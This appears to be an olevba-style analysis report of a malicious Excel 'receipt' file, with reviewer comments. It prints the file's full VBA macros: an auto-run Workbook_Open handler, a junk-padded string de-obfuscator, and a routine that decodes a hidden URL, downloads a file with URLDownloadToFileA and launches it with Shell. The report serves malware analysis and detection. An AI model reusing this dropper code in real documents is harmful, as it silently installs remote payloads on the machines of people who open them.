- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS---- logmein_pro_receipt.xls
- (Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: logmein_pro_receipt.xls
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ЭтаКнига.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub Workbook_Open() ' Auto-exec entry point: Excel runs this handler when the workbook is opened and macros are allowed
- jQ5 ' Only statement: calls jQ5, the Sub in module dfgfdg that builds the URL/path and triggers the download-and-run helper
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+---------------+----------------------------------------+
- | Type | Keyword | Description |
- +----------+---------------+----------------------------------------+
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- +----------+---------------+----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Лист1.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Лист2.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Лист3.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class2.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class3.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function vxRuzMJsFffGPcDYCb(AUKBPaIIvwQgsU As String) As String ' String de-obfuscator: returns the characters at odd 1-based positions of AUKBPaIIvwQgsU and discards every second (filler) character
- GoTo jvLMiktQy ' Junk control flow: every GoTo in this function jumps to the label on the very next line, so none of them changes execution
- jvLMiktQy:
- GoTo YexFubVVUa
- YexFubVVUa:
- For SrJVJGASPnQ = 1 To Len(AUKBPaIIvwQgsU) Step 2 ' Walk the input two characters at a time, starting at position 1
- GoTo pPBRUYPoRwgcQlcS
- pPBRUYPoRwgcQlcS:
- GoTo ZZMyawIQEV
- ZZMyawIQEV:
- GoTo maQQjhDZxDzLOdzA
- maQQjhDZxDzLOdzA:
- GoTo OsHauNHxdmnlqbTbFSR
- OsHauNHxdmnlqbTbFSR:
- GoTo ogETMxfh
- ogETMxfh:
- vxRuzMJsFffGPcDYCb = vxRuzMJsFffGPcDYCb & Mid(AUKBPaIIvwQgsU, SrJVJGASPnQ, 1) ' Append the single character at the current position to the return value
- GoTo wGcpdOq
- wGcpdOq:
- Next
- GoTo UmYcCdoiA
- UmYcCdoiA:
- GoTo pOGCNfuPDMkfIKrKQZN
- pOGCNfuPDMkfIKrKQZN:
- GoTo DBGekrVjiyCEw
- DBGekrVjiyCEw:
- GoTo dNvxRuzM
- dNvxRuzM:
- GoTo FffGPcDYCb
- FffGPcDYCb:
- GoTo tEyQzQGQQSfvKRTdAv
- tEyQzQGQQSfvKRTdAv:
- End Function ' NOTE(review): the keyword scan reports nothing for this module, presumably because it contains no flagged API names; it still matters as the decoder for the string literals passed in jQ5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Class4.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class5.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class6.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO dfgfdg.bas
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/dfgfdg'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 Then ' Conditional compilation: VBA7 hosts get the PtrSafe declaration with LongPtr arguments
- Private Declare PtrSafe Function FnjkHBKJBl Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal sdfFFF As LongPtr, _
- ByVal kJNJKBl As String, _
- ByVal ghjVFF As String, _
- ByVal BGgdhF As Long, _
- ByVal VVgfh As LongPtr) As LongPtr ' FnjkHBKJBl is only a local alias; the real import is URLDownloadToFileA from urlmon
- #Else ' Other VBA hosts: the same import declared with Long arguments
- Private Declare Function FnjkHBKJBl Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal sdfFFF As Long, _
- ByVal kJNJKBl As String, _
- ByVal ghjVFF As String, _
- ByVal BGgdhF As Long, _
- ByVal VVgfh As Long) As Long ' Same alias and same API as the VBA7 branch
- #End If
- Sub jQ5() ' Called from Workbook_Open: builds the download URL and the local target path from obfuscated literals, then passes both to mog4O4d49
- mog4O4d49 vxRuzMJsFffGPcDYCb("hHtztHp^:R/u/Ujuanvidze,sMijgxn{.)dWeM/…j%sd/pb1i@n,.ie`xae^"), Environ(vxRuzMJsFffGPcDYCb("TgMJPW")) & vxRuzMJsFffGPcDYCb("\eG…HUjSkrd_fdgT.„eXx/e+") ' Arg 1: decoded URL. Arg 2: Environ(<decoded variable name>) & <decoded file name>. All three literals pass through vxRuzMJsFffGPcDYCb, so no plaintext URL or path appears in the macro; decode them offline before extracting IOCs
- End Sub
- Function mog4O4d49(Mh9_094suu As String, R4_t As String) As Boolean ' Download-and-execute helper: Mh9_094suu is the source URL, R4_t the local file path; the Boolean return value is never assigned
- vJHKBJdfkgfg = FnjkHBKJBl(0&, Mh9_094suu, R4_t, 0&, 0&) ' Calls the URLDownloadToFileA alias to save the URL to R4_t; the result goes into the undeclared variable vJHKBJdfkgfg and is never checked
- Dim j_W8
- j_W8 = Shell(R4_t, 1) ' Launches the file at R4_t via Shell with window style 1, whether or not the download succeeded. Detection point: an Office process fetching a file and then starting it as a child process
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | URLDownloadToFileA | May download files from the Internet |
- +------------+--------------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Class7.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class7'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class8.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class8'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class9.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class9'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class10.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class10'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)